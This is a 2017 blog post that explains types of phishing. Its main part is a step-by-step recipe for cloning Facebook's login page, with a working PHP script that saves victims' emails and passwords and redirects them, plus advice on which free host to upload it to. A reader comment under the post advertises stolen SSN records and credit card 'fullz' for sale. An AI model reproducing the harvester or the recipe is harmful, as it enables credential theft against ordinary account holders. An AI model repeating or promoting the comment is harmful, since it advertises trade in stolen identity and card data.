What is Phishing ? types of Phishing ? | by mr-shubham

April 30, 2017


What is Phishing ? types of Phishing ? | by mr-shubham




hello friends ...
do you know what is phishing ? phishing page?types of phishing ?whats the uses ?
> Phishing is a method to obtain sensitive username and passwords, credit card numbers, bank accounts by claiming or pretending to be someone you are not.
> A case study shows that around 80% of email accounts such as Facebook, yahoo, hotmail etc get hacked with this method.

>  Phishing may be of many types. The most common and popular types of Phishing are:

                           1. Fake login pages
                           2. Desktop Phishing
                           3. Link manipulation
                           4. Filter Evasion
                           5. Tabnabbing

1) Fake login pages 




>  In this method a hacker creates a fake page of any website such as paypal, yahoo, orkut etc similar to the original and asks the victim to login through that page.
> Once the victim logins through that page his email id and passwords gets stored and hence gets his account gets hacked.
>  The hacker which creates exact pages without errors are familiar with HTML (Hyper text markup language) and PHP (Hypertext processor).


> Here I will show you the exact method which a hacker will take to make a fake login page.


1. First a hacker would choose a target. Here I am choosing target as Facebook.com which is most popular target among all.


2. Next the hacker would go to the target site i.e. Facebook and right click on it and click on view source.


3. Now the hacker would Copy the source and save it into a WordPad or Notepad and rename it something like Facebook.htm.

4. Now open Facebook.htm in a WordPad. Right click the file and click on open with and select WordPad. Now search for “Form method” 
      Now change action=”http://login.facebook.com/login.php” to “Pass.php” and change method=“post” to “Get”

5. Next the hacker would create a PHP script which would save the entered username and password and save it something like Pass.php. The code for the script is:



<?php /* Created on: 4/30/2017 */ $fp = fopen("FacebookPasswords.htm", "a"); fwrite($fp, "Email:$_POST[email]\tPassword: $_POST[pass]"); echo "<HTML> <head> <title>Welcome to Facebook</title> <FRAMESET cols=\"*\">  <FRAME SRC=\"http://www.fb.com\" </FRAMESET>";?>


Note: Here http://www.fb.com is the redirection url when the victim will enter his username and password in the fake page he will be redirected to www.fb.com so he wont become suspicious.


6. Now the hacker would create an account on webhosting site that supports php to upload the files. Some of popular Free hosting sites are:


i suggest you use www.000webhost.com


7. Next the hacker will upload the two files Facebook.htm and Pass.php to one of these sites




8. Once you have uploaded both the files to a webhosting site then uploaded facebook.htm is the fake page which the hacker will sent to the victim. Once the victim will enter his username and password it will be saved in a .txt file.

10. Now the hacker will just download the file and view the saved password inside



2) Desktop Phishing


> Desktop phishing is another type of Phishing.

> In desktop phishing hackers change your Windows/System32/drivers/etc/hosts file, this file controls the internet browsing in your PC. 

>Hackers send a Phisher arm which when installed into victims computer changes its Windows/System32/drivers/etc/hosts file. 

>When victim tries to log in to real page he is redirected the fake page and thus loses  his password there.

> The figure below shows the working of desktop phishing:



3)Link manipulation


> Link manipulation is another type of phishing.

>The method is same the normal fake login page but in this method the hacker does not upload the files to normal web hosting site but instead he buys a domain 

         For example: If the target is then the hacker will buy something like www.okrut.com,                                                  www.orkutt.com. When the victim will see the fake page he will think that its a                                       normal site as there is a slight difference b/w web Address therefore he/she                                      will login through it and loose their password. 


Filter evasion


> In this method the hackers use images instead of text. 

>The reason which they do so is to make it harder for anti-phishing filters to detect text.

> These are commonly used in phishing emails.

>The figure below will show you an example of a Phishing scam.

> The Hyperlink “Click here to activate your account” in the above email will take the victim to fake paypal login page where he/she will loose his password.




5) Tabnabbing


> Tabnabbing is a new type of phishing and the most dangerous one. 

>  In this method the hacker takes advantage of  multiple tabs. 

>The victim visits the attackers site and opens another tab leaving the attacker site open. 

>While the victim browse other tabs the attackers site redirects it self to the fake login page say facebook. 

>Now when the victim will see the fake page he will think it as a normal facebook page and will login through it and therefore gets his/her account hacked.


if you like my post then please like ,comment and follow us.

follow me on

Blog : -  https://mr-shubham.blogspot.com
Google+  : -https://plus.google.com/110760514616847264726
Facebook  :  - https://www.facebook.com/mr-shubham/
Subscribe on Youtube  : -https://www.youtube.com/channel/UCUVTmlx18qWJm0y_hrnG3nw/featured

Twitter : - https://twitter.com/pctricks0143

stay happy..stay blessed.😊👍

you can also see my previous posts :-

1.) Disable windows updates on windows  10..... for that click here 

2.) Most Hidden Tricks on Google..... for that click here 

3.) Top 10 Countries with most Hackers in the World..... for that click here 

4.) How to stop someone's internet access..... for that click here 

5) What is Phishing?types of Phishing . for that click here

6)Access computer/laptop from mobile (remotely) for that Click here



Also u can watch my youtube video ....

Most hidden things on google
https://youtu.be/orI83ysci_0


How to create simple blog/website
https://youtu.be/DuLEXNd1kDU

Check Anyone's Youtube video earning 2017 (by PcTicks143)
https://youtu.be/bNRaac3FrhU

How to get location details by image
https://youtu.be/MSIylrJOmyA

How to embed youtube video to blogger/website
https://youtu.be/XruFhEmAFBQ

How to see Hidden files in pendrive(or any drive)
https://youtu.be/ULN-oB4095A

How to Hide All Storage Drive
https://youtu.be/Sqtwgxke9JI

Leave a Comment

1 comment:

  1. No Name10 June 2020 at 04:46

    Hi All!

    I'm selling fresh & genuine SSN Leads, with good connectivity. All data are tested & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank NAME | DL Number | House Owner

    *You can ask for sample before any deal
    *Each SSN lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE & FRESH CC FULLZ ALSO AVAILABLE<==
    -->$5 PER EACH

    Hope for the long term deal
    For detailed information you can make contact on:

    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete

Subscribe to: Post Comments ( Atom )
Powered by Blogger.